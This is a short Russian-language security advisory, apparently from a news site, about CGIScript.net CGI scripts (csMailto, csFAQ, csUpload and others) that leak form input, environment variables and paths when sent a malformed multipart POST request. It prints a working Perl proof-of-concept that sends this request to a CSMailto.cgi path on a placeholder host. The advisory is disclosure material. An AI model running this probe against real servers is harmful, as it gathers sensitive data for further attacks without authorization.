CGIScript.net выпускает множество CGI сценариев, облегчающих создание Web сайта. 

При представлении некорректного POST запроса, многие сценарии раскроют чувствительную информацию, типа ввода формы, переменных среды, пути. Полученная информация может использоваться в дальнейших нападениях против уязвимой системы. Эксплоит: 

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data
use strict;
use IO::Socket::Inet;
my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';
my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;
close($sock);

Уязвимость обнаружена в CGIScript.net csBanner, csCreatePro, csDownload, csFAQ, csFiler, csFileshare, csGrid, csIncludes, csMailto, csNews, csRandomText, csUpload 1.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии